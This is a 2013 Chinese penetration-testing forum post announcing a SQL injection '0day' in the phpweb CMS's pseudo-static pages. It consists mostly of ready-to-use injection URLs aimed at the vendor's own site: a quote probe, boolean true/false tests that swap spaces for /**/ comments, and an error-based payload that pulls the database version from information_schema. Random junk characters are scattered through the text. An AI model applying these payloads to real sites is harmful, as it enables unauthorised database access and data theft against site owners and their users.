中国网络渗透测试联盟

标题: phpweb伪静态页面注入0day [打印本页]
作者: admin    时间: 2013-1-4 19:46
标题: phpweb伪静态页面注入0day
phpweb所有的整站程序伪静态页面都存在sql注入% Q2 A  R3 A+ V" h$ [

9 n0 ]! s4 q( z3 A# p2 O( F主站:http://phpweb.net/: y% e! w, Y, c. |
加’检测:
/ M4 l6 H6 w6 X% X* q! q 0 p. i5 ~0 d/ @3 n) X5 `/ C6 V
http://www.phpweb.net/down/html/?772′.html: e/ `4 a# L/ {. E

8 [9 d& M& t0 O( W. t" N4 |% l" H出错$ \& t0 P; E) m- W
存在注入。
' }* B) v0 R$ _0 \2 b* a- D不能用空格,只能用/*罗
" b$ W/ l0 z+ y$ W; {http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常6 h2 g2 s( a( J

, @8 ]! Z+ P) r2 c6 Y9 T! Fhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
- Q" |7 t$ Z0 z' I+ h) O7 t7 _+ w; x: ]2 e爆数据库版本:1 s6 n5 l8 Z0 l( T  X6 C
3 l% |: S' q3 n9 f$ U0 u+ M' E+ {
?
9 X0 E. U  S$ r1( U" k2 H9 w2 S, a5 s" H
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html2 R- ^& b  X2 n  @" p/ i, w1 w
更新日期: 2013-01-03 13:39:50        
$ o' G4 }6 s5 Q" S( t



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2